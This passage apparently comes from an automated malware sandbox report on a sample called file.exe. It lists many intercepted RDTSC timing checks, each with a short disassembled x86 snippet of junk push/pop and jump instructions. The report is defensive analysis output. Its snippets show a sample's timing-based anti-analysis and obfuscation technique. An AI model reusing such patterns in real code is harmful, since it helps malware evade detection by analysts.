                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CDCF second address: 7CDC5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3A7Ah], ebx 0x00000010 push dword ptr [ebp+122D0725h] 0x00000016 jc 00007F9FD14BA529h 0x0000001c call dword ptr [ebp+122D3AFFh] 0x00000022 pushad 0x00000023 xor dword ptr [ebp+122D3920h], edx 0x00000029 xor eax, eax 0x0000002b sub dword ptr [ebp+122D3080h], ecx 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 xor bh, 00000029h 0x00000039 mov edx, dword ptr [ebp+122D2CD5h] 0x0000003f popad 0x00000040 jmp 00007F9FD14BA52Ah 0x00000045 mov dword ptr [ebp+122D2CF1h], eax 0x0000004b jng 00007F9FD14BA532h 0x00000051 jmp 00007F9FD14BA535h 0x00000056 mov esi, 0000003Ch 0x0000005b jns 00007F9FD14BA52Ch 0x00000061 mov dword ptr [ebp+122D3AF4h], esi 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b cld 0x0000006c lodsw 0x0000006e mov dword ptr [ebp+122D3080h], edi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 stc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d add dword ptr [ebp+122D3AF4h], edx 0x00000083 nop 0x00000084 push ebx 0x00000085 push eax 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CE3B second address: 96CE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9FD0BBDFF6h 0x0000000a popad 0x0000000b add dword ptr [esp], 4DBCA156h 0x00000012 mov edi, 5426C357h 0x00000017 call 00007F9FD0BBDFF9h 0x0000001c pushad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F9FD0BBE007h 0x00000025 popad 0x00000026 jnc 00007F9FD0BBDFF8h 0x0000002c push esi 0x0000002d pop esi 0x0000002e popad 0x0000002f push eax 0x00000030 push esi 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push ecx 0x00000035 pop ecx 0x00000036 popad 0x00000037 pop esi 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F9FD0BBDFF6h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CFE5 second address: 96CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D1D7 second address: 96D1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D31A second address: 96D31E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D31E second address: 96D351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F9FD0BBDFF8h 0x0000000c popad 0x0000000d nop 0x0000000e adc ecx, 51D09885h 0x00000014 push 00000004h 0x00000016 jmp 00007F9FD0BBE000h 0x0000001b nop 0x0000001c je 00007F9FD0BBE004h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D351 second address: 96D355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6CB second address: 96D6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6D1 second address: 96D6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D6D5 second address: 96D743 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0BBDFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F9FD0BBDFF8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 0000001Eh 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F9FD0BBDFF8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 pushad 0x00000046 mov cx, 0C0Fh 0x0000004a mov esi, dword ptr [ebp+122D2D31h] 0x00000050 popad 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jns 00007F9FD0BBDFF6h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D743 second address: 96D747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D869 second address: 96D86F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DAD8 second address: 96DAE2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF69F second address: 9AF6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF952 second address: 9AF95C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD0C645E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF95C second address: 9AF97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD080A019h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF97D second address: 9AF983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF983 second address: 9AF9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9FD080A016h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFB1F second address: 9AFB44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F9FD0C645E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFB44 second address: 9AFB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A00Ah 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFCEE second address: 9AFD4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9FD0C645F2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9FD0C645F6h 0x00000017 jmp 00007F9FD0C645F9h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFE8D second address: 9AFE9F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFE9F second address: 9AFEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9FD0C645F8h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0078 second address: 9B0088 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F9FD080A006h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0088 second address: 9B00B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9FD0C645F9h 0x00000008 jmp 00007F9FD0C645EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37C7 second address: 9B37E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A00Fh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jl 00007F9FD080A00Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B85B0 second address: 9B85BA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9FD0C645E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B81B4 second address: 9B81C6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD080A006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F9FD080A006h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB4F2 second address: 9BB508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F9FD0C645ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB508 second address: 9BB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BACB0 second address: 9BACBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9FD0C645E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BACBD second address: 9BACC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BAE6C second address: 9BAE83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB009 second address: 9BB012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB012 second address: 9BB041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0C645F5h 0x00000009 jmp 00007F9FD0C645F5h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB041 second address: 9BB046 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BB046 second address: 9BB091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F9FD0C645F8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9FD0C645F8h 0x00000014 jmp 00007F9FD0C645F2h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF207 second address: 9BF20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECD3 second address: 9BECDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECDB second address: 9BECEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9FD080A006h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BECEB second address: 9BECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2F78 second address: 9C2FA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD080A00Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F9FD080A014h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2701 second address: 9C270B instructions: 0x00000000 rdtsc 0x00000002 je 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2ACA second address: 9C2AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2AD0 second address: 9C2AD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2AD6 second address: 9C2B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9FD080A00Ch 0x0000000b jmp 00007F9FD080A018h 0x00000010 pushad 0x00000011 jmp 00007F9FD080A00Fh 0x00000016 jmp 00007F9FD080A014h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7383 second address: 9C738B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C738B second address: 9C73BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9FD080A014h 0x0000000a popad 0x0000000b push esi 0x0000000c ja 00007F9FD080A006h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F9FD080A006h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C74EA second address: 9C7506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9FD0C645ECh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007F9FD0C645E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7506 second address: 9C7515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F9FD080A006h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7515 second address: 9C751D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7660 second address: 9C769A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9FD080A01Fh 0x00000008 jmp 00007F9FD080A00Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F9FD080A01Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C769A second address: 9C76A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7806 second address: 9C7811 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7811 second address: 9C781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C781C second address: 9C7830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD080A010h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7830 second address: 9C783D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0C645E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D514 second address: 96D52D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D52D second address: 96D537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9FD0C645E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96D537 second address: 96D5A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A012h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dx, si 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F9FD080A008h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D3AF4h], edx 0x00000033 jmp 00007F9FD080A012h 0x00000038 mov dword ptr [ebp+122D2805h], ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9FD080A014h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0947 second address: 9D094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9BB second address: 9CE9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEDF9 second address: 9CEE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F9FD0C645E6h 0x0000000e popad 0x0000000f jo 00007F9FD0C645F2h 0x00000015 jbe 00007F9FD0C645E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE16 second address: 9CEE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9FD080A012h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CEE2F second address: 9CEE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9FD0C645F1h 0x00000008 jnl 00007F9FD0C645E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF187 second address: 9CF1BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007F9FD080A006h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9FD080A010h 0x00000011 push edi 0x00000012 jmp 00007F9FD080A014h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFA69 second address: 9CFA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F9FD0C645FDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFD1 second address: 9CFFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFD6 second address: 9CFFDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFFDC second address: 9CFFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D05E7 second address: 9D05FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0C645EEh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D05FF second address: 9D0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0603 second address: 9D0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7462 second address: 9D7472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F9FD080A006h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2D7 second address: 9DA2DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2DB second address: 9DA2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9FD080A00Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA2ED second address: 9DA2FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 jng 00007F9FD0C645FFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5BB second address: 9DA5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5C1 second address: 9DA5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5C5 second address: 9DA5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A00Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD080A018h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5ED second address: 9DA5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA89D second address: 9DA8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8A5 second address: 9DA8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9FD0C645E6h 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8B0 second address: 9DA8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA8B8 second address: 9DA8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD0C645EEh 0x00000010 jmp 00007F9FD0C645EAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAA0D second address: 9DAA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
